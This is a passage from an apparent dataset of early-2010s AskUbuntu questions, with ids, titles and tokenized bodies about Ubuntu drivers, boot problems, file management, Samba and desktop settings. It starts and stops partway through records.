ultimate n wifi link 5300 subsystem : intel corporation device 1101 flags : fast devsel , irq 17 memory at feafe000 ( 64-bit , non-prefetchable ) [ size=8k ] capabilities : [ c8 ] power management version 3 capabilities : [ d0 ] msi : enable- count=1/1 maskable- 64bit+ capabilities : [ e0 ] express endpoint , msi 00 capabilities : [ 100 ] advanced error reporting capabilities : [ 140 ] device serial number 00-16-ea-ff-ff-02-37-50 kernel modules : iwlagn iwconfig lo no wireless extensions . eth0 no wireless extensions . dmesg | grep iwl iwlagn 0000:03:00.0 : detected intel ( r ) ultimate n wifi link 5300 agn , rev=0x24 [ 12.739505 ] type=1400 audit ( 1322948504.417:2 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /sbin/dhclient '' pid=702 comm= '' apparmor_parser '' [ 12.740090 ] type=1400 audit ( 1322948504.421:3 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=702 comm= '' apparmor_parser '' [ 12.740397 ] type=1400 audit ( 1322948504.421:4 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=702 comm= '' apparmor_parser '' [ 12.748344 ] iwlagn 0000:03:00.0 : unsupported ( too old ) eeprom ver=0x114 < 0x11a calib=0x3 < 0x4 [ 12.770778 ] iwlagn 0000:03:00.0 : pci int a disabled [ 12.770797 ] iwlagn : probe of 0000:03:00.0 failed with error -22 [ 12.772171 ] nvidia : module license 'nvidia ' taints kernel . [ 12.772177 ] disabling lock debugging due to kernel taint rfkill list 0 : hci0 : bluetooth soft blocked : no hard blocked : no
86591	what filesystem to use when working between ubuntu & mac ?	if i want to share files ( locally , not over network ) , what filesystem do i use ?
86594	how to share 3g connection via wifi ubuntu 10.10	i 'm fedup with creating wifi hot spot in my asus eee netbook using 3g modem . i tired several tutorials on the internet , unfortunately nothing works . please guide me..
86597	unable to install pdfshuffler in ubuntu 11.04	i am unable to install pdfshuffler in ubuntu 11.04 . i am getting the following error , karthick @ ubuntu-11.04 : ~ $ sudo apt-get install pdfshuffler reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : pdfshuffler : depends : python-poppler but it is not going to be installed e : broken packages update : karthick @ it-chennai : ~ $ sudo apt-get install -f reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . karthick @ it-chennai : ~ $ sudo apt-get update hit http : //in.archive.ubuntu.com maverick release.gpg ign http : //in.archive.ubuntu.com/ubuntu/ maverick/main translation-en ign http : //in.archive.ubuntu.com/ubuntu/ maverick/main translation-en_in hit http : //extras.ubuntu.com maverick release.gpg ign http : //extras.ubuntu.com/ubuntu/ maverick/main translation-en ign http : //in.archive.ubuntu.com/ubuntu/ maverick/multiverse translation-en ign http : //in.archive.ubuntu.com/ubuntu/ maverick/multiverse translation-en_in ign http : //in.archive.ubuntu.com/ubuntu/ maverick/restricted translation-en ign http : //in.archive.ubuntu.com/ubuntu/ maverick/restricted translation-en_in ign http : //in.archive.ubuntu.com/ubuntu/ maverick/universe translation-en ign http : //in.archive.ubuntu.com/ubuntu/ maverick/universe translation-en_in ign http : //extras.ubuntu.com/ubuntu/ maverick/main translation-en_in hit http : //in.archive.ubuntu.com maverick release hit http : //extras.ubuntu.com maverick release hit http : //in.archive.ubuntu.com maverick/main sources hit http : //extras.ubuntu.com maverick/main sources hit http : //in.archive.ubuntu.com maverick/restricted sources hit http : //extras.ubuntu.com maverick/main i386 packages hit http : //in.archive.ubuntu.com maverick/universe sources hit http : //in.archive.ubuntu.com maverick/multiverse sources hit http : //in.archive.ubuntu.com maverick/main i386 packages hit http : //in.archive.ubuntu.com maverick/restricted i386 packages hit http : //in.archive.ubuntu.com maverick/universe i386 packages hit http : //in.archive.ubuntu.com maverick/multiverse i386 packages reading package lists ... done karthick @ it-chennai : ~ $ sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded .
86598	grub2 unable to find other oses	i have windows 7 installed on another internal harddrive . i installed grub2 but its not recognizing any other os other than ubuntu . does anyone know how to make it scan for oses or add an os manually ? thanks !
86600	ubuntu software center or update manager is having trouble downloading	when i try to use ubuntu software center or update manger it has trouble downloading any new software , it just cant connect to the internet . i can still install software if i download the file ( .apt ) from my browser
86601	to fix 'grub rescue ' problem	i have windows 7 and ubuntu 10.04 in my laptop.after installing ubuntu 11.10 along side with them and restarting the system only 'files not found ' ; 'grub rescue ' appears on the screen.how could i fix the problem ?
86602	completely remove lxde/lubuntu desktop environment	i 've install lxde on my laptop due to unity 's disappointing performance . but now , i want to completely remove lxde including it 's entire list of programs that came installed with it . how do i go about doing so ?
86604	i ca n't install programs from ubuntu software center	i ca n't install programs from ubuntu software center . it tells me connection error , but my internet connection is working . can anyone please help me , i 'm using natty narwhal .
86609	is there a non-mono alternative to power saving tool jupiter ?	i 'd like a power saving tool similar to jupiter but without all the mono dependencies . does it exist ?
86615	exclude folder from sync	i have several subdirectories in my ubuntuone directory ( docs , photos , music ) and installed ubuntuone on several devices ( laptop , pc , ... ) . i want my docs and photos to be synced with all the connected devices ( especially docs ) , but i want to exclude the music directory . it 's huge , and i do n't want a copy of this directory on every device . is there a way to achieve this ( with both ubuntu and windows devices ) ? it 's in the ubuntuone directory , so that i access it with ubuntu one music .
86617	how to burn a 7.5gb to a normal dvd-r	i 'm trying to backup my god of war ps2 game however the iso that i created is 7.5gb large . normal dvd-rs however have a 4.7gb size limit . how and with which tools can i backup a dvd dual layer on a normal dvd-r ?
86618	how to install windows on linux	i know that there is a way in which , one can install linux or ubuntu on windows easily but , what about installing windows on linux or ubuntu i.e if i have a machine with only ubuntu , how can i install windows on it without removing ubuntu ? i do n't want to do this in a virtual machine . i just want to have two os in a single hard drive .
86630	`` disk drive for /dev/shm is not ready yet '' at boot	i am running ubuntu 11.10 i386 on a laptop . i recently upgraded linux generic kernel to 3.0.0-14 with a ppa ( eugensan/boiler ) : i actually was looking to install just one piece of software ( `` unison '' ) , but i got carried away and installed all the updates the ppa was providing , including the kernel ( silly of me , i know ... , i 'll sure think twice next time ) after the upgrade , at boot time the system complains with : disk drive for /run/shm is not ready yet or not present '' and a similar message for /run/tmp i can still boot by opting to skip these filesystems . however chrome will not work now unless i enter the following commands : sudo mkdir /run/shm chmod 1777 /dev/shm i reverted back to the previous kernel ( 3.0.0-13 ) , removed the ppa and searched the web quite extensively , but to no avail . i also checked /etc/fstab and this is what i have : proc /proc proc nodev , noexec , nosuid 0 0 /dev/sda1 / ext4 errors=remount-ro 0 1 uuid=c79075aa-eb63-43bc-ab8f-12eb26bfcfbd none swap sw 0 0 if anybody has any suggestion on how to fix this , it would be greatly appreciated !
86631	.htaccess file ignored on ubuntu server	i 'm having a problem with an .htaccess file on a newly installed ubuntu server running apache2 . the .htaccess file in the directory where the wordpress files are located is n't being take into account when the server loads pages . there is n't an allowoverride statement in the apache2.conf file , but the default is all , and it does n't change anything if i include one . i 've tried including the contents of the local .htaccess file in a section . i 've also tried this : < directory /var/www/mydomain.com/html > allowoverride all < /directory > i also tried changing all instances of allowoverride in /etc/apache2/sites-available/default ( which are all set to noneby default ) to all . but i 've had no luck . not sure how to solve this one .
86633	kde4 memory use optimization	are there any good tips for optimizing kde4 memory consumption ? it feels like a memory hog , even when i have 4gb of ram and i5 cpu it feels heavy . i disabled all effects but still it feels heavy and consumes twice more memory then gnome . any points for optimization of kde4 ( not ubuntu in general ) ?
86634	ubuntu one control panel constantly says `` file sync starting ''	the file syncing process appears to have stalled . when i upgraded from 11.04 to 11.10 my system stopped working , and so i reinstalled 11.04 . i then copied some of my files into the same folders that they are in in ubuntu one ( so , i copied the same music that is in music/coldplay stored in ubuntu one into the same folder on my desktop , to save bandwidth and time ) . at first , files started syncing normally . however , now , all i see in my ubuntu one control panel is the above message . furthermore , when i try to check the tickbox next to a cloud folder that is not yet ticked , everything grays out . please help !
86635	what is this brltty init script ?	i 'm on my way to cleanup my system , started from init scripts , and found : /etc/rcs.d/s25brltty the description header was n't helpful enough , and what 's that used for , and if it 's safe to purge ?
86638	xubuntu 11.10 proxy server settings	i would like some recommendations for setting up the proxy server settings for xubuntu 11.10 . i tried searching on google and i got 2 common results that made use of command line stating that i should put these texts : export http_proxy= '' http : //server : portnumber '' export https_proxy= '' http : //server : portnumber '' export ftp_proxy= '' http : //server : portnumber '' export http_proxy= '' http : //server : portnumber '' export https_proxy= '' http : //server : portnumber '' export ftp_proxy= '' http : //server : portnumber '' on ... 1 ) .bashrc file 2 ) /etc/environment ... therefore , what/where 's the best way to put the codes then ? is the .bashrc file a user config or a system-wide config ? lastly , can a gui be installed to make such reconfiguration easier for students ? i 'm actually teaching them how to use xubuntu ( because ubuntu 's having a hard time with our workstations ) . thanks !
86643	ubuntu software centre - error	when i am trying to install any application from ubuntu software centre , it is throwing below messages.. failed to download package files . check your internet connection but when i try from terminal it is working fine .. ! i have no issue with my internet , it is working fine . i tried below things , apt-get remove software-centre apt-get install software-centre apt-get install updates apt-get install upgrades but , no use please help .
86647	where is trash bin in ubuntu 11.10 with gnome shell ?	i am using ubuntu 11.10 with gnome classic shell . how can i open trash bin ?
86649	unrar causes cpu spike and ca n't be killed	from time to time i see my cpu usage spike and my laptop starts to heat up . i run top and see that an unrar process is running and consuming anything from 40 - 99 % of cpu capacity . i try to kill it using sudo killall -9 unrar or similar , but the process either respawns straight away or keeps running . i 'm a reformed mac user who 's only been running ubuntu for a year , so sorry i ca n't provide any more detailed information .
86650	how to remove link from application panel	in ubuntu 11.10 with gnome classic shell i managed to add some links to the application panel ( top panel with applications , places menu ) . but i do n't know how to remove a link from the panel .
86651	why do i briefly see a black srceen with white writing which then disappears when trying to install ubuntu on an hp pavilion g7 ?	i recently bought a hp pavilion g7 laptop . i made a nice ubuntu 11.10 usb using pendrivelinux . when i try to install it a black screen with white letters appears ( like normally ) but disappears again . then my screen is turning off then nothing happens any more . what is the problem ? i 've read about nomodeset or something like that but how do you do it ? i do n't have the option when i try to install .
86654	bootloader smashed	yesterday i got a friend to burn a disk with the `` try out/install '' package of ubuntu . my problem is following : tried to install ubuntu on another partition then the one i got windows installed on . this resulted in that my bootloader now is completely smashed and i can not boot any of my os 's . right now i am trying to install ubuntu once again using the exact same dvd but it always seem just to stand endlessly on the install step . nothing ever happens . had it stand all night long and when i woke up it wall still installing . anyone knows how to resolve this problem and actually get ubuntu on my pc ? thanks in advanced .
86660	i can not enter my password in the terminal - ca n't install packages	i can open a terminal ( ctrl-alt-t ) i can copy or type in the following : sudo wget http : //www.medibuntu.org/sources.list.d/oneiric.list -o /etc/apt/sources.list.d/medibuntu.list when prompted for password , i can not enter anything via keyboard . any clues ?
86662	wireless low sensitivity hp pavilion dm1 on ubuntu 11.10	i have a recently bought hp pavilion dm1 with ubuntu 11.10 installed . it is able to detect my personal wireless network when in close proximity to the router , however it fails to do so when i 'm in a different room ( unless i connected previously ) , let alone at my university . any thoughts ? output of sudo lshw -c network : *-network description : wireless interface product : bcm4313 802.11b/g/n wireless lan controller vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan0 version : 01 serial : 60 : d8:19:74:73:6b width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=brcmsmac driverversion=3.0.0-13-generic-pae firmware=n/a ip=192.168.50.100 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:16 memory : f0200000-f0203fff *-network description : ethernet interface product : rtl8111/8168b pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:07:00.0 logical name : eth0 version : 06 serial : 10:1f:74 : b7:42 : d7 size : 10mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=n/a latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:41 ioport:2000 ( size=256 ) memory : f0104000-f0104fff memory : f0100000-f0103fff output of iwconfig wlan0 : wlan0 ieee 802.11bgn essid : '' my_wireless '' mode : managed frequency:2.437 ghz access point : 00:16:0a:0f:8a:46 bit rate=11 mb/s tx-power=19 dbm retry long limit:7 rts thr : off fragment thr : off power management : off link quality=47/70 signal level=-63 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:10 invalid misc:82 missed beacon:0
86668	ntfs exec mount rights	i have a problem : to let binaries run right from my ntfs flashdrive , i have to umount it and then manually mount ( namely , $ mount -t auto /dev/sdb1 /media/flash works well ) . i do n't want to hardcode mount rights for this flashdrive in fstab or elsewhere , but i just want to mount every ntfs drive with exec rights . how do i achieve this ?
86669	how to integrate audacious in the sound menu ?	i was wondering if you would know a way to integrate audacious in the sound menu , just like banshee . the plugin inside audacious to put a status icon does n't seem to do it .
86671	i am unable to open or edit my software sources	i want to change my software sources because i do n't want to update my ubuntu from other software sources . i tried to change it from unity dock : i typed software source and a icon appeared but when i clicked nothing happened . and then i tried it from update manager : i clicked on edit- > source but nothing happened . i am still able to download and install updates as well as software from ubuntu software center
86675	banshee wo n't open	hello , world . my computer turned off while banshee was updating my music library . now i ca n't open it . the error says : `` found a fatal error . exception has been thrown by the target of an invocation . '' any clues ?
86677	ati/amd radeon driver through jockey results in error	i am not trying to waste the resource of askubuntu . i 've tried a lot of methods shown online , but i still ca n't this done . i 'have installed ubuntu 11.10 in my laptop . i have both intel 3000 hd graphic and amd radeon 6470 hd . of course i want to make use of my amd vga . i 've tried : download the driver through additial drivers and restart the machine . result : i . before driver installation , i got unity 3d , after that , it become 2d . i log off , and choose ubuntu 3d , still i ca n't get the 3d effect ii . i went to system info , graphic , driver unknown , experience standard iii . i opened amd catalyst , error message something like driver is not installed appropietary download latest amd catalyst 11.11 for linux 64 bits , after follow the online steps , purge the original driver , and install the .run installer and so on . result : i restart pc , and 1 process fail to start up , and i ca n't get into ubuntu desktop . have to re-install ubuntu . thanks for helping me and sorry for my broken english . appreciate if someone helps edit
86679	does a samba workgroup with spaces need quotes around it ?	if my windows workgroup is made of two words with a space in-between , does samba 's config file need quotes around the workgroup name , example : workgroup = `` my workgroup ''
86684	after updating kernel to 3.0.0-14 the system does not boot	after the updatemanager gave me an update of the kernel from 3.0.0-13 to -14 i am not able to boot with that new kernel . i have to manually select -13 from older kernels . this is even true for failsafe mode ... it shows the animated bootlogo and after 1 or 2 minutes the animation freezes , after that point the hdd-light flashes randomly . i took a nap for an hour or so for one of the tryies , not even in this hughe timespan something happened . with ctrl-alt-delete i can still shut down the system , also it responds to the power-switch and shuts off , in both cases without any animation . i just see that the hdd-activity raises and after a further minute or two the system powers down . robinj made a suggestion it could have something to do with my nvidia-drivers , so i followed his instructions ( remove the nvidia-driver , reboot into old kernel , reboot into new kernel , reinstall driver ) . but removing the drivers did not help . the boot does still stuck , so i cant reinstall the driver in the new kernel . but during the reboot process i managed to hit escape at the right point of time . the last message displayed before the boot stops is checking battery state . so i tried to boot without ac-adapter or battery , both does not help either , so i am back at kernel version -13 ( still without the drivers ) is there a way to get -14 working or at least have -13 standardkernel for booting until the problem is solved ?
86686	usbmount + samba permissions	i installed usbmount package on ubuntu server lucid 10.04 . it worked fine . i just plug in my usb flash . the server detects it and automatically mounts it under /media/usb0 . i want this usb folder to be available as samba share . i want it to be available to everyone with full control . the problem is that the usbmount mounts it using default permissions with root as owner . any idea how i can configure the usbmount to do this ?
86687	why are my dash icons empty ?	i just ran the update manager this morning which required a restart . after the restart this is what my dash looks like : the empty icons are : home folder terminal gedit trash
86688	gnome shell extension window list do n't utilize space in top panel	as you can see in the image , gnome shell extension window list do n't utilize left space properly . there is some limit approximately in the middle of the screen . after that it does n't expand . is there any way to customize the window list extension to use proper space according to our needs ... like i can apply a particular amount of boundary between status icon ( notification icon ) and windows list .
86692	workspace switcher only shows 1x4 grid and no animations	i did a fresh install of 11.10 . since then the workspace switcher shows no switching animation ( including the small 2x2 preview when pressing ctrl+alt+arrow key ) . all i see is a plain 1x4 grid of workspaces . also , when switching to another workspace , all windows get maximised every time . messing with the ccsm options gave me no result . this never happened in 11.04. http : //i.imgur.com/ef3eu.jpg
86694	wireless usb adapter on 10.04	update 2 : i 'm trying to follow the guide posted by matt : http : //linuxwireless.org/en/users/drivers/ath9k_htc but i do n't know where to enter the following : config_ath_common=m config_ath9k_hw=m config_ath9k_common=m config_ath9k_htc=m those need to be enabled in the kernel config . anyone know how to do that ? update 1 : i have searched on this page : https : //help.ubuntu.com/community/hardwaresupportcomponentswirelessnetworkcardsnetgear # usb but it does not list the wnda3200 , however it does list the wnda3100 . original question : i have been given a wireless usb adapter by my isp . after plugging the device in , it does not appear in the networkmanager applet . so i tried lsusb and i got this : bus 001 device 004 : id 0cf3:20ff atheros communications , inc. what needs to be done for me to use this wireless usb adapter ? the wireless usb adapter is an : netgear wireless 11n dual band usb adapter wnda3200 i am using an up-to-date install of ubuntu 10.04 lts . any advice would be greatly appreciated .
86700	how do you remove unity lenses ?	i installed a unity lens on 11.10 that showed the firefox bookmarks . i do n't want it anymore , but i ca n't figure out how to get rid of it . how can i get rid of it ?
86701	is there a fix for the won't-restart won't-reboot won't-logout bug in 11.10	since i upgraded to 11.10 , neither the `` shutdown '' ( for shutdown or restart ) nor the `` logout '' options in the upper-right-corner menu work . they simply do nothing . while waiting for ubuntu to release a fix , is there something i can do to have them work again ? my current workaround for rebooting or shutting down is to open a terminal and type `` shutdown -r now '' or `` shutdown -h now '' , which work . is there a similar workaround for logging out ? anyway i 'm also looking for a real fix that would make the shutdown/logout options in the menu work . hibernate and suspend do work , by the way .
86702	will this 'find and delete ' command work with the asterisk even with quotes ?	i want to run a command similar to this where avi files older than 7 days will be deleted : find `` /home/user/videos folder/*.avi '' -mtime +7 -exec rm -f but as you can see , the videos folder has a space so i had to put that path in quotes . but , will the asterisk still do its job to find all avi files , or will linux now think the asterisk is the actual filename now ? let 's just assume i did n't want to remove the space in the path by renaming the folder .
86704	'waiting for network connection ' error on boot	when i start my system , all the process is perfectly normal , until this message appears : 'waiting for network configuration ' after that one there comes 'waiting up to 60 more seconds for network configuration ' and finally , like after 3 minutes of waiting , there comes 'booting system without full network configuration ' . normally , at home i 'm connected through a normal wired internet connection , but when i need to take my laptop to any other place without a wired internet connection like work or the university , the above mentioned messages appear and well ... i really get a bit pissed off . is there any possibility to make my system stop trying to configure the network at boot when i have absolutely no network to configure ? i do n't really mind modifying my system settings every time i come home or go to work so , maybe if there is a solution like 'well this is going to stop the booting network configuration , but when you need to use a wired network you will have to reconfigure it ' it 's going to be perfect .
86708	how do i know what version of firefox i have ?	where is the menu in firefox so i can check what my firefox version is ?
86711	how can i make a script to place files older than each day before into their own folder ?	i 'm running an unnecessarily complex script which looks similar to this command : find /home/user/videos/*.avi -mtime +0 -exec mv -f { } `` /home/nb/videos/1 day old '' \ ; and then i run the same command , but this time , from the `` 1 day old '' folder into a `` 2 days old '' folder . and some more commands keep repeating all the way up to 7 days old ! so each day , files from the previous `` x days old '' folder move into the next day up 's folder . i 'm basically trying to organise files automatically , running in cron , to move files older then x days into the correct folder . it 's inefficient , but i do need this to happen . is there any easier , more efficient way ? once it gets to the 7 days old folder , i have the final command which removes files older than 7 days from that last folder .
86722	how do i take an image/backup of ubuntu partition and restore to virtualbox vm	i have ubuntu 10.04 installed on an older hard disk . i recently bought a new disk and already installed windows 7 . i dont want to use the older disk anymore , and i would like to keep on using ubuntu in a virtual machine on the new disk ( to avoid the possible mess-ups of dual boot and i found virtualbox is the best free tool for this ) . i wish to keep the exact same data\programs\configurations\settings i had been using in ubuntu for so long , and avoid the tedious part of having to reconfigure so many things . how do i backup\restore ubuntu to another disk ? i would prefer a free tool to do the backup\restore .
86724	how do i open the disk utility in the unity desktop environment ?	i am new to ubuntu and have installed it side by side with windows 7 . both boot up okay , my problem is i ca n't get to disk utility to create a partition that i can share between both oss . help says go to activities - > overview and select disk utility there . i ca n't find activities .
86734	i can not see the bottom part of system windows - resolution seems to be off	i recently acquired a hp mini netbook with a broken hard drive . i have booted ubuntu 11.10 from a usb drive and it works great . i would like to install the os to an external hard drive . the problem is , my screen resolution is off so that the bottom part of system windows are cut off . i can scroll in applications , but not in the system settings window . i tried to perform an install and it went well until i was asked to choose a user logo , i could n't go any further because i could not press the 'accept ' button . is there a was to change the screen resolution or modify the aspect while booting from a usb drive ? the only resolution option i have is 1024 x 526 ( 16:9 ) , and for whatever reason this is cutting off the bottom of the screen . the only other solutions i have seen require either logging out or re-booting , which do n't seem to work because the system reboots the same way from the usb everytime .
86739	how to decide which version of ruby to install , ruby1.8 or ruby1.9.1 ?	i am thinking about learning the basics of ruby , so i want to install the ruby interpreter , irb , etc. , on my ubuntu 11.10 box . i quickly found that there are two main branches of ruby -- the 1.8 branch and the 1.9.1 branch . this provokes the question of how to decide which branch to install . i saw a similar split with python 's 2.x and 3.x branches , but in the case of python , i could find some discussions of the pros and cons of each branch . i have n't found such a discussion with respect to ruby 's branches . my first impulse is to install the latest stable version , which would be ruby1.9.1 ( which is actually ruby version 1.9.2 , which has been a stable release for about two years ) . i do n't know how different the two branches really are .
86744	what command can delete folders older than x days or x months ?	i know a command to do the same with files , but what about folders ( and all the files in it of course ) ?
86746	gnome-shell stopped working after last update	after an update 3 days ago gnome-shell stopped working , trying to restart it with gnome-shell -- replace only results in another crash and the keyboard stops working . this is what i get when trying to start gnome-shell : st_widget_get_theme_node called on the widget [ 0x24112a0 stbutton.status-chooser-user-icon ] which is not in the stage . gnome-shell-calendar-server [ 4829 ] : got hup on stdin - exiting trace/breakpoint trap if i look in the xorg.0.log i got this error : gnome-session [ 5321 ] : warning : app 'gnome-shell.desktop ' respawning too quickly and : critical : we failed , but the fail whale is dead . sorry ... . ran metacity -- replace just to get the window borders back for now . the interesting thing is if i log in to xfce i got the same problem , no window boarders , must run metacity -- replace in xfce also . running ubuntu 11.10 with gnome-shell 3.2.1 .
86748	some apps tray icons shown only in the compiz widgets layer	i 'm noticing that some apps tray icons ( gnome-rdp , ups status , blueproximity ) are missing from the tray notification area but are shown below the bar when you f9 to the compiz widgets layer . any way to bring'en back to the correct place ? i 'm running a cairo-dock gnome session and a cairo-dock theme named oneiric-panel . cairo-dock 's `` notification area '' and `` old notification area '' modules are bound to cairo-dock0s upper dock . when i accidentally pressed f9 i discovered my missing tray icons below cairo-dock 's upper dock ...
86749	how to change the file manager from nautilus to marlin	i want to try out the marlin file manager in 11.10 and want to know how to go about it
86757	how do i calculate md5sum for a variable ?	i have a given variable and i have to calculate its md5sum . i have tried with `` md5sum $ variable '' , but it does n't work .
86762	how do i make a server using ubuntu so people can download files from me ?	i just set up a ubuntu system and i want to use it to host some files so that people can download them with some sort of link i send them . i have a cable modem connection to the net and my provider is roadrunner . is there a simple way to do this with ubuntu as an ftp server , web server or some other configuration ? i am new to ubuntu and unix/linux so i know very little about getting it to do much at the command-line level . thanks .
86765	removed nvidia driver and now ca n't boot	i have an older gateway 510x and i recently installed a geforce 6200 card and upgraded fine to 11.10 . however due to hibernate and wakeup problems and indication 's that this could be due to the nvidia driver , i , in my infinite wisdom , removed the driver and am now dead in the water - wo n't boot . i can get to the grub splash screen ( i also have a ms windows 7 partition ) . how do i reinstall the driver if i ca n't boot ? i can come up with my 11.04 live cd . i am not expert at this and am 70 years old so complete explanations would be helpful .
86767	restart when i go to /home or run certain programs	after the last update , ubuntu 11.10 restarts when i try /home , texmaker , texstudio , kile or virtualbox , but libreoffice , firefox , etc. , work fine ...
86769	how to auto indent the characters of rb , erb , .html.erb files ?	in mac using text - mate we can easily auto - indent the characters in the file for ruby on rails code in various rb , erb or html.erb files . i am searching for a plugin for gedit for the same purpose after trying hard i am unable to find any suitable plugin which can work for me . any clues which plugin i should go for and how to get that ?
86770	how to install nautilus action-3.1.5 ?	i have downloaded the last release of nautilus-action ( 3.1.5 ) and i want to install it , how to do that ? ? ?
86773	update manager does n't ask for a password	oneiric update manager no longer asks for a password to update already installed software . this is a change in behavior from previous versions . is there a way to revert this behavior and get the update manager in oneiric to ask for a password again ? thanks !
86776	marlin and integration of various vcs ?	i just stumbled in another question ( http : //askubuntu.com/questions/86749/how-to-change-the-file-manager-from-nautilus-to-marlin ) upon the filemanager `` marlin '' . i tried it a bit , and it seems to suit me more than nautilus . except one tiny thing ... i had nautilus-integrators for svn , git , bazaar , mercurial , cvs . not as a replacement for the commandline tools , but i wanted to see the status of a file in the filebrowser . are there plugins for marlin that have at least these status icons ? context menu for the various vcs is not needed but would be nice for quickaccess .
86779	after disabling the password login the system will no longer accept any password meaning i can not do anything that requires authentication	the system tells me my root password is wrong even though i know it is right . resetting the password with passwd username does n't work and throws up the error authentication token manipulation error , password was unchanged . groups output is john adm dialout cdrom plugdev nopasswdlogin lpadmin admin sambashare i thought this might have something to do with the permissions on /usr/bin/passwd but they turned out to be correct . i 'm out of ideas , does anyone have any insight ?
86784	why i ca n't use my nvidia video driver with gnome-shell ?	i 've a notebook asus aspire 5742g with a video card nvidia geforce gt 540m . if i install raccomended driver from jockey , gnome shell after login goes into fallback mode . can i solve this ?
86787	how to pass file as argument in .desktop file for wine application	i actually want to ask two questions : where can i find more about available arguments/parameters shortcuts for exec entry in desktop files ( like % u , % u , % f ... ) main question , how to pass file as argument on .desktop launcher for wine application ? i found searching here this suggestion : z : % f which is of no use to me , as if i simply run .desktop file without passing file on it , it assumes that argument is z : and starts scanning z : `` drive '' example : [ desktop entry ] name=some windows program exec=wine `` program.exe '' z : % f type=application terminal=false mimetype=application/docbook+xml i want to drop xml file on my custom .desktop launcher for this wine application and i can this way . problem is that if i click on launcher icon to evoke this program , argument z : is always passed on it and that 's not acceptable
86789	which file on a usb live installation made with unetbootin persists file information ?	i created an installation of ubuntu 11.10 using unetbootin on a usb thumbdrive . i 've downloaded programs and installed them with apt-get so that they persist on the drive between boots . what file stores these persisted files , if you were to look at it on a computer that had not been booted from the thumbdrive ?
86790	why does 11.10 use so much ram in unity but not gnome-shell	why does 11.10 use so much ram in unity but not gnome-shell it just seems to be an all-around resource hog . windows 7 is less taxing . even though ubuntu uses 550-700 mb on average it makes my fan go crazy , my computer hot , and is kinda slow . windows 7 uses 1.45 gigs on average ( mostly cache ) is faster ( in launching programs , about the same boot time ) and more responsive and does n't make my fan run all the time and my computer stays at a decent temperature .
86795	what is the best dictionary/translator ?	i want a dictionary or translator that uses or near to google translation for translating from english to arabic , vise-versa or between any languages , so what is the best it would be better if this program has an indicator or launcher quick-list ? ? ?
86796	shorewall missing from ubuntu 11.10 default repository ?	i 'm looking to configure my network using shorewall on my ubuntu 11.10 laptop . when i run apt-cache search it does n't find shorewall , is there some other repository i can add it from ? or is the debian package listed on the shorewall website compatible with ubuntu 11.10 , since ubuntu is debian-based ?
86797	keep getting mails about xdebug	i 'm running oneiric as a lamp development server , and have xdebug installed . it works fine , but since i set up my email so that root mails are forwarded to my gmail , i keep getting the following : subject : cron < root @ pingu > [ -x /usr/lib/php5/maxlifetime ] & & [ -d /var/lib/php5 ] & & find /var/lib/php5/ -depth -mindepth 1 -maxdepth 1 -type f -cmin + $ ( /usr/lib/php5/maxlifetime ) ! -execdir fuser -s { } 2 > /dev/null \ ; -delete mail body php warning : module 'xdebug ' already loaded in unknown on line 0 every 30 minutes . the cron job is in /etc/cron.d/php5 - it looks like it 's to ensure sessions are automatically cleaned . the cron job looks like it 's needed - and is running a php script - but why is it complaining about xdebug , and how do i fix it ?
86798	customize the power button action ( ubuntu 10.04 )	i would like to customize the power button action . the tutorial at http : //blog.metalight.dk/2010/07/ubuntu-lucid-custom-power-button-event/ works but not always ( the number of shutdown processes can sometimes be different ) . i need the solution where 1x press of a button executes the usual os shutdown 3x press of a button executes os reboot how would you write the code for it ? file : /etc/acpi/powerbtn.sh # ! /bin/sh # /etc/acpi/powerbtn.sh # initiates a shutdown when the power putton has been # pressed . # you need to double 'click ' the power button to shutdown ( if ! [ $ ( pidof -x powerbtn.sh | wc -w ) -eq 3 ] ; then sleep .4 exit else poweroff fi ) &
86799	does radeon xvideo acceleration still work in 11.10 ?	i have a thinkpad t42 with an ati radeon mobility 7500 graphics chip ( rv200 chipset ) , which is supported by the open radeon driver . under 11.04 vlc is happy to play back hd video at an excellent framerate using the xvideo extension ( hardware accelerated overlay ) : vlc -- vout xvideo myvideo.mp4 vlc media player 1.1.9 the luggage ( revision exported ) blocked : call to unsetenv ( `` dbus_activation_address '' ) blocked : call to unsetenv ( `` dbus_activation_bus_type '' ) [ 0x903e914 ] main libvlc : running vlc with the default interface . use 'cvlc ' to use vlc without interface . blocked : call to setlocale ( 6 , `` '' ) warning : call to srand ( 1323805494 ) warning : call to rand ( ) blocked : call to setlocale ( 6 , `` '' ) ( process:4926 ) : gtk-warning ** : locale not supported by c library . using the fallback 'c ' locale . brainfart cropping not supported , this could look slightly wrong . .. under 11.10 , vlc will not use the xvideo extension . when overlay is enabled ( hardware acceleration ) , video becomes choppy . with it disabled , performance is better , but not smooth . vlc -- vout xvideo myvideo.mp4 vlc media player 1.1.12 the luggage ( revision exported ) blocked : call to unsetenv ( `` dbus_activation_address '' ) blocked : call to unsetenv ( `` dbus_activation_bus_type '' ) [ 0x8a4292c ] main libvlc : running vlc with the default interface . use 'cvlc ' to use vlc without interface . blocked : call to setlocale ( 6 , `` '' ) blocked : call to setlocale ( 6 , `` '' ) ( process:1817 ) : gtk-warning ** : locale not supported by c library . using the 